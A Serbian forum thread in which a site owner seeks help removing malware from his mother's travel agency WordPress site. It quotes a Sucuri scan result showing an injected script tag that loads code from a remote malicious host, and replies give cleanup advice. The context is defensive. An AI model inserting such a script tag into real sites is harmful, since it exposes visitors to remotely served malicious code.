Šta je novo?

Problem sa malware-om...

nesharm

Čuven
VIP član
Učlanjen(a)
11.12.2000
Poruke
2,778
Poena
680
Hajd da vidimo da li neko moze ovde da pomogne, situacija sledeca :

sajt turisticke agencije moje majke dobije malware, gde Sucuri izbacuje :

Website Malware malware-entry-mwanomalysp8 http://belatours.rs/404testpage4525d2fdc ( View Payload )
Website Malware malware-entry-mwanomalysp8 http://belatours.rs/404javascript.js ( View Payload )
Website Malware malware-entry-mwanomalysp8 http://belatours.rs/?s= ( View Payload )

Poruka je uvek ista
*Anomaly behavior detected (possible malware). Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script type="text/javascript" src="http://gyllen.info/gallery/zvqc74xh.php?id=146"></script>

Posto sam seo da googlam, prvo sto sam naleteo je na .htaccess fajl, i da on moze biti izmenjen, pri cemu imam pet takvih fajlova na serveru :

PHP:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress

Ovo je primer najveceg, gde apsolutno nigde ne vidim da bilo sta vodi ka nekoj redirekciji koja je ocigledno problem. Verujem da se kod zavukao negde, da li neko ima ideju gde da ga potrazim? Ono sto shvatam je da vrlo lako nema nigde direktne redirekcije u kodu, vec se poziva neka skripta koja prakticno vodi ka pomenutom Gyllen.info itd, sto tek ne vidim nacin kako da nadjem.

Momak koji je kacio ovaj sajt kaze ne zna da resi problem, a ja programer nisam, doduse, umem da se snadjem po kodu i delimicno shvatim sta cemu sluzi 🙂.
 
Poslednja izmena:
Koliko vidim, u pitanju je Wordpress. Sucuri nije bas 100% pouzdan i ume da brlja, tj. da izbacuje false-positive, ali vrlo verovatno je neko injectovao PHP fajl kroz neki busan plagin, ili kroz neki Wordpress propust (u slucaju da nije redovno azuriran). Jedino momak koji odrzava sajt moze da ti pomogne, ili mi baci PM pa cu ja da pogledam 🙂
 
Ne bi trebalo da je previše teško pronaći zaraženi fajl, recimo po datumu izmene fajla bi mogao onako na brzinu da vidiš šta je poslednje promenjeno, a deluje mi da bi mogao biti index.php iz teme.
Glavno pitanje je kako se to desilo i kako da popraviš, bez ispravke propusta tebi skoro ništa neće vredeti da izbaciš parče koda koje ti sada pravi problem jer su velike šanse da ćeš u roku mesec dana opet imati istu situaciju.
 
Kudti je pomogao, nadjen malware u header fajlu teme, i index.php-u iste, promenio je dosta parametara, i sad je sve ok.
 
Nazad
Vrh Dno